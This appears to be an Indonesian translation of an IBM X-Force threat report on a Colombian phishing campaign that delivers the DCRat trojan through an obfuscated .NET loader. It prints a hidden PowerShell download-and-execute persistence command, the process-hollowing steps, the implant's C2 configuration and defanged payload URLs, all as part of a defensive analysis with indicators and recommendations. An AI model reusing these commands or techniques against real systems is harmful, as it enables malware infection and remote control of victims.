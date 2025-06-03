Tag
Analisis Ancaman X-Force IBM: Kehadiran DCRAT tumbuh di Amerika Latin

Pada awal Mei 2025, IBM X-Force mengamati Hive0131 melakukan kampanye email yang menargetkan pengguna di Kolombia dengan pemberitahuan elektronik tentang proses pidana, yang konon berasal dari The Judiciary of Colombia. Hive0131 adalah kelompok bermotivasi finansial yang kemungkinan berasal dari Amerika Selatan yang secara rutin melakukan kampanye sebagian besar di Amerika Latin (LATAM) untuk mengirimkan beragam muatan komoditas. Kampanye saat ini meniru korespondensi resmi dan berisi tautan tertanam atau umpan PDF dengan tautan yang disematkan. Mengklik tautan yang disematkan akan Initiate® rantai infeksi untuk mengeksekusi trojan perbankan "DCrat" dalam memori. 

DCRAT dioperasikan sebagai Malware-as-a-Service (MaaS), pertama kali muncul setidaknya pada tahun 2018, dan banyak diiklankan di forum kejahatan siber Rusia, dapat dibeli dengan harga sekitar USD 7 untuk langganan dua bulan. Kehadiran DCRAT tersebar luas dan telah menjadi makin populer di LATAM setidaknya sejak 2024. Selama musim panas 2024, X-Force mengamati beberapa kampanye yang banyak menargetkan entitas di Kolombia, semuanya meniru perusahaan LATAM yang mengkhususkan diri dalam ekosistem dokumen elektronik di Meksiko dan Kolombia. Namun, mengingat perbedaan dalam rantai infeksi dan pengiriman dCRAT, X-Force menilai bahwa kampanye 2024 dan saat ini dilakukan oleh aktor yang berbeda. Kampanye yang diamati pada tahun 2024 sangat bergantung pada file RAR yang dilindungi kata sandi yang berisi NSIS untuk menjalankan pengunduh GuLoader, sedangkan kampanye baru-baru ini bergantung pada pemuat.NET yang kabur yang kami beri nama VMDetectLoader. 

Kemampuan DCRat

  • Melewati AMSI
  • Mendeteksi lingkungan analisis
  • Menghentikan proses yang diblokir
  • Memperoleh persistensi melalui tugas terjadwal atau kunci registri
  • Mendengarkan perintah dari server perintah dan kontrol (C2)

DCRAT dilengkapi dengan plugin yang mampu melakukan tugas-tugas berikut, meskipun aktor ancaman dapat membuat plugin khusus untuk menyelesaikan tugas tambahan:

  • Merekam korban melalui mikrofon atau kamera komputer
  • Mengunggah dan mengunduh file
  • Menjalankan perintah
  • Memperoleh informasi sistem
  • Mengenkripsi dan mendekripsi file
  • Mengedit kunci registri
  • Pencatatan penekanan tombol dan data clipboard
  • Memanipulasi sistem file

Jenis ancaman

MaaS

Pria menatap komputer

Perkuat intelijen keamanan Anda  

Tetap terdepan dalam menghadapi ancaman dengan berita dan insight tentang keamanan, AI, dan lainnya, setiap minggu di Buletin Think.  

Analisis

Pada awal Mei 2025, X-Force mengamati kampanye email Hive0131 yang meniru Kehakiman Kolombia (Rama Judicial de Colombia), mengaku berasal dari Sirkuit Sipil Bogota, Kolombia, untuk mengirimkan pemberitahuan elektronik tentang proses pidana. Kampanye yang diamati berisi umpan PDF dengan tautan ke TinyURL atau berisi tautan yang disematkan ke lokasi Google Docs. 

Ikhtisar RanTAI Infeksi - PDF dengan TinyURL

Untuk email yang berisi umpan PDF yang mengarah ke tinyurl, korban diarahkan ke arsip ZIP bernama 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. Arsip ZIP berisi file jinak serta file JavaScript berbahaya bernama 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.js. File JavaScript mengunduh muatan JavaScript dari situs paste[.]ee dan menjalankannya. Payload ini kemudian mengeksekusi perintah PowerShell yang mengunduh JPG dari hxxps: //archive [.] org/download/new_ABBAS/new_ABBAS.jpg dengan pemuat berkode base64 ditambahkan ke akhir file. Setelah dieksekusi, pemuat mengunduh dan mengeksekusi DCrat dalam memori.

Loader diberi nama VMDetectLoader karena kemampuannya untuk menentukan apakah dapat berjalan di lingkungan sandbox. Analisis menunjukkan bahwa pemuat didasarkan pada proyek sumber terbuka https://github.com/robsonfelix/VMDetector.

Rantai Infeksi RAMA
Gambar 1: Rantai Infeksi RAMA
Contoh email dengan lampiran PDF
Gambar 2: Contoh email dengan umpan PDF

Ikhtisar rantai infeksi - Tautan Google Docs Tertanam

Rantai infeksi ini dimulai dengan email phishing yang berisi tautan ke unduhan Google Docs dari arsip ZIP yang dilindungi kata sandi bernama CUI 158616000129-2025-10047_122011111777.zip, kata sandinya ada di email dan adalah 3004. Arsip berisi pengunduh file batch, CUI 158616000129-2025-10047_122011111777.bat, yang mengunduh dan mengeksekusi komponen VBScript (VBS) yang dikaburkanhxxp://paste[.]ee/d/jYHEqBJ3/0  ke %WinDir%\Temp\Pernambuco.vbs. Skrip VBS kemudian memecahkan kode dan mengeksekusi skrip PowerShell yang dikodekan base64 yang mengunduh VMDetectLoader melalui file JPG dari hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
Muatan akhir kemudian diunduh oleh VMDetectLoader melalui paste[.]ee URL diteruskan ke sana oleh skrip PowerShell.

Rantai infeksi RAMA dengan Google Docs
Gambar 3: Rantai infeksi RAMA dengan Google Docs
Contoh email dengan tautan Google Docs
Gambar 4: Contoh email dengan tautan Google Docs

VMDetectLoader

VMDetectLoader adalah pemuat .NET (Microsoft.Win32.TaskScheduler.dll) yang dikaburkan yang dapat ditemukan di VirusTotal di https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. Analisis metadata pemuat menunjukkan bahwa kode tersebut didasarkan pada proyek sumber terbuka https://github.com/robsonfelix/VMDetector.

Atribut Rakitan:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Sebelum memuat payload, pemuat mendeteksi mesin virtual, mencetak daftar atribut host ke konsol jika mesin virtual terdeteksi. Sebagai contoh:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Fungsionalitas

VMDetectLoader dieksekusi melalui VIA dnlib.IO.Home.VAI()  fungsi dan data yang diteruskan mirip dengan berikut ini. Informasi ini dapat bervariasi tergantung pada kampanye.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argumen

Deskripsi

$storeman

 URL Pastée terbalik dari mana muatan yang dikodekan base64 diunduh. 

MSBuild

 Proses injeksi target

C:\Pengguna\Publik\Unduhan
rhabdosteus
js

 Jalur yang digunakan dalam membuat tugas terjadwal: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Bendera yang menunjukkan pemeriksaan proses

bimetalisme

 Nama tugas yang dijadwalkan

Selama eksekusi, VMDetectLoader, XOR mendekripsi string penting sesuai kebutuhan dari sumber daya.NET " HiXS ".

Contoh string yang didekripsi dalam folder

Contoh string yang telah didekripsi

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistensi

Jika dikonfigurasi untuk melakukannya, tugas terjadwal dibuat untuk menjalankan perintah PowerShell berikut yang mengunduh dan mengeksekusi payload JavaScript:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Tugas lain dapat dibuat, jika dikonfigurasi, untuk mengeksekusi payload JavaScript menggunakan perintah berikut:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

Loader juga dapat membuat kunci Registry run untuk mengeksekusi payload:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Proses injeksi

VMDetectLoader memiliki kemampuan untuk menggunakan teknik injeksi lubang proses untuk mengunggah muatan ke berbagai contoh proses target. Misalnya, untuk kampanye yang dianalisis, C:\Windows\Microsoft.NET\ Framework\ v4.0.30319\ MSBuild.exe (32-bit) atau C:\Windows\Microsoft.NET\ Framework64\ v4.0.30319\ MSBuild.exe (64-bit) adalah proses target. Fungsi yang bertanggung jawab untuk injeksi proses diberi nama HackForums.gigajew.x64.Load()  untuk sampel 64-bit dan dnlib.IO.Tools.Ande() untuk sampel 32-bit,

Jalankan proses injeksi hollowing:

  1. Buat proses yang ditangguhkan menggunakan createProcess () dengan dwCreationFlags disetel ke CREATE_SUSPENDED (4).
  2. Hapus peta memori dalam proses target menggunakan ZwUnmapViewOfSection().
  3. Alokasikan memori baru dalam proses target menggunakan VirtualAllocEx().
  4. Tulis payload ke memori yang baru dialokasikan menggunakan WriteProcessMemory().
  5. Perbarui titik masuk untuk proses menggunakan GetThreadContext() dan SetThreadContex().
  6. Jalan kan ResumeThread() untuk mengeksekusi kode.

DCRat

Jika ditentukan bahwa VMDetectLoader berjalan di lingkungan yang aman, payload akhir dimuat melalui proses hollowing. Dalam hal ini, payload akhir adalah dCRAT dengan data konfigurasi berikut.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Kesimpulan

X-Force melacak beberapa kelompok yang beroperasi di lingkungan ancaman Amerika Latin yang melakukan kampanye email yang mengirimkan MaaS untuk tujuan keuntungan finansial. Di antara kelompok yang dilacak adalah Hive0148 dan Hive0149, yang berfokus pada pengiriman Trojan Grandoriero Banking, Hive0153 mengirimkan malware Adwind dan SambaSpy, dan Hive0131. Meskipun Hive0131 biasanya berfokus pada operasi dengan pengiriman malware seperti QuasarRAT dan NJRAT, X-Force telah mengamati peningkatan kampanye yang melibatkan DCRAT. Dengan pengamatan yang stabil dan berkelanjutan terhadap malware yang dikirimkan kepada pengguna di dalam LATAM, IBM X-Force menilai bahwa Amerika Latin akan Lanjutkan menghadapi penargetan dari aktor ancaman yang ingin menerapkan trojan perbankan melalui kampanye phishing dalam upaya untuk mendapatkan kredensial pengguna dan informasi sensitif lainnya.

Rekomendasi

Entitas di LATAM didorong untuk berhati-hati dengan email yang berisi lampiran, tautan, atau yang meminta unduhan file. Selain itu, entitas disarankan untuk melakukan hal berikut:

  • Berhati-hatilah dengan email yang berisi tautan atau perintah mengunduh
  • Pantau bukti injeksi proses berbasis host, pembuatan proses nakal, pembuatan tugas terjadwal, dan modifikasi registri
  • Instal, perbarui, dan konfigurasikan perangkat lunak keamanan titik akhir
  • Memantau aturan titik akhir
  • Berburu bypass kebijakan eksekusi

Indikator kompromi

Indikator

 Jenis Indikator

  Konteks

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 Berkas Pembawa 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 Arsip ZIP

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Loader .NET yang Dikaburkan

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 Arsip ZIP

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 Skrip PS

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 Skrip PS

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Pengunduh Skrip Batch

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Tautan PDF Tertanam

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 URL Unduhan Payload

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Tautan Email Tertanam

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 URL Unduhan Payload

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 URL Unduhan JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 URL Unduhan JPG

Intelijen Ancaman IBM X-Force Premier sekarang terintegrasi dengan OpenCTI, memberikan intelijen ancaman yang dapat ditindaklanjuti tentang aktivitas ancaman ini dan banyak lagi. Akses insight tentang aktor ancaman, malware, dan risiko industri. Instal OpenCTI Connector untuk meningkatkan deteksi dan respons, memperkuat keamanan siber Anda dengan keahlian IBM X-Force. Tetap di depan —integrasikan hari ini.

